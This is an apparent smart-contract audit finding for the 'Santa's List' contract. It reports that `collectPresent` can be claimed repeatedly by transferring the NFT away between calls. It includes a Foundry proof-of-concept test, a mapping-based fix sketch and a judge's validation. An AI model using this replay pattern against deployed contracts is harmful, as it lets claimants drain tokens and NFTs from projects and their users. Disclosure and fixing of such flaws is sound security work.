Severity: high
Valid

User can call collectPresent as many times as they want

Summary

Due to insufficient validation in the `collectPresent` function, a user can claim Santa's NFTs or tokens multiple times.

Vulnerability Details

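```solidity
function testCanCollectPresentIfAlreadyCollected() public {
    // Santa marks the user as NICE on both passes of the list
    vm.startPrank(santa);
    santasList.checkList(user, SantasList.Status.NICE);
    santasList.checkTwice(user, SantasList.Status.NICE);
    vm.stopPrank();

    // Move past the Christmas timestamp so collection is open
    vm.warp(santasList.CHRISTMAS_2023_BLOCK_TIME() + 1);

    vm.startPrank(user);
    // First claim
    santasList.collectPresent();
    // 0 is the expected tokenId in this case
    santasList.transferFrom(user, address(2), 0);
    // The user's balance is 0 again, so the second claim does not revert
    santasList.collectPresent();
}
```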

In the above PoC, a user can pass the `if (balanceOf(msg.sender) > 0)` validation and call the `collectPresent` function as many times as they want by simply transferring the claimed NFT to another address after each claim.

Impact

User can claim an infinite amount of tokens and NFTs.

Tools Used

Manual Review

Recommendations

Possible solution: Introduce a mapping that tracks if a user has successfully claimed rewards once and use that mapping as a validation in the collectPresent function.
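
A sketch of the recommended mapping, shown next to the weak balance-based guard; this is an added example, not the audited contract's source. The contract is a simplified stand-in: every name other than `collectPresent`, `balanceOf` and `transferFrom` is hypothetical, and the NICE-list and Christmas-time checks are omitted.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Simplified stand-in for the audited contract (assumption: not its real code).
contract PresentClaimSketch {
    error AlreadyCollected();
    error NotOwner();

    mapping(address => uint256) public balanceOf;    // NFT count per holder
    mapping(uint256 => address) public ownerOf;      // tokenId => holder
    mapping(address => bool) private s_hasCollected; // set once, never cleared
    uint256 private s_nextTokenId;

    // Weak form from the finding: the guard reads state the caller can
    // reset by transferring the NFT away.
    function collectPresentWeak() external {
        if (balanceOf[msg.sender] > 0) revert AlreadyCollected();
        _mint(msg.sender);
    }

    // Hardened form: the guard is a per-address flag that transfers do not touch.
    function collectPresent() external {
        if (s_hasCollected[msg.sender]) revert AlreadyCollected();
        s_hasCollected[msg.sender] = true; // record the claim before minting
        _mint(msg.sender);
    }

    // Minimal holder-only transfer, enough to replay the PoC's transferFrom step.
    function transferFrom(address from, address to, uint256 tokenId) external {
        if (ownerOf[tokenId] != from || msg.sender != from) revert NotOwner();
        balanceOf[from] -= 1;
        balanceOf[to] += 1;
        ownerOf[tokenId] = to;
    }

    function _mint(address to) private {
        uint256 tokenId = s_nextTokenId++;
        ownerOf[tokenId] = to;
        balanceOf[to] += 1;
    }
}
```

Replaying the PoC sequence (claim, transfer token 0 away, claim again) succeeds against `collectPresentWeak` and reverts with `AlreadyCollected` against `collectPresent`.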

Updates

Lead Judging Commences

inallhonesty Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

Weak Already Collected Check

Relying on balanceOf > 0 in collectPresent() allows the msg.sender to send their present to another address and then collect again.
